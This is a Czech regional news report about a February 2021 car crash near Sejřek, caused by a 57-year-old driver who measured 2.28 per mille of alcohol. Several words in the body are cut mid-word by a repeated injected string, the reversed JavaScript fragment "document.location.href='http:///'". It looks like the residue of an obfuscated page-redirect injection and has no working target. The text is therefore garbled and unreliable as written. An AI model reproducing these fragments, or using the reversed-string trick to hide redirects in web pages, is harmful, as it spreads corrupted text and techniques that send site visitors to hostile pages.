Rainbow page separator

Sedmapadesátiletá řidička havarovala, nadýchala 2,28 promile

Pátek, 26. února 2021

Sejřek / U dopravní nehody dvou osobních au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů, ke které došlo v pátek 19. února kolem půl šesté na silnici druhé třídy v katastru Sejřku a jež se neobešla bez zranění, zasahovali policisté.
„Sedmapadesátiletá řidička vozidla značky Opel jela ve směru od obce Střítež k obci Olší, přičemž při projíždění zatáčky přejela do protisměru, kde se střetla s projíždějícím vozidlem značky Chrysler. Opel následně vyjel mimo vozovku. Jeho řidička a spolujezdkyně z chrysleru byly s podezřením na lehké zranění transpor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny zdravotnickou záchrannou službou k ošetření do nemocnice,“ informovala policejní mluvčí Stanislava Rázlová.
U šoférů obou aut policisté provedli dechovou zkoušku na pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost alkoholu, přičemž pro řidičku opelu dopadla špatně. „U řidičky au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu značky Opel byl výsledek pozitivní a naměřená hodnota činila 2,28 promile alkoholu. Výsledky opakovaných měření byly 2,26 a 2,22 promile. U řidiče druhého vozidla byla zkouška na alkohol negativní,“ upřesnila mluvčí s tím, že policisté na místě provedli šetření a zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování události, z čehož vyplynulo, že řidička svým jednáním naplnila znaky skutkové podstaty trestného činu ohrožení pod vlivem návykové látky.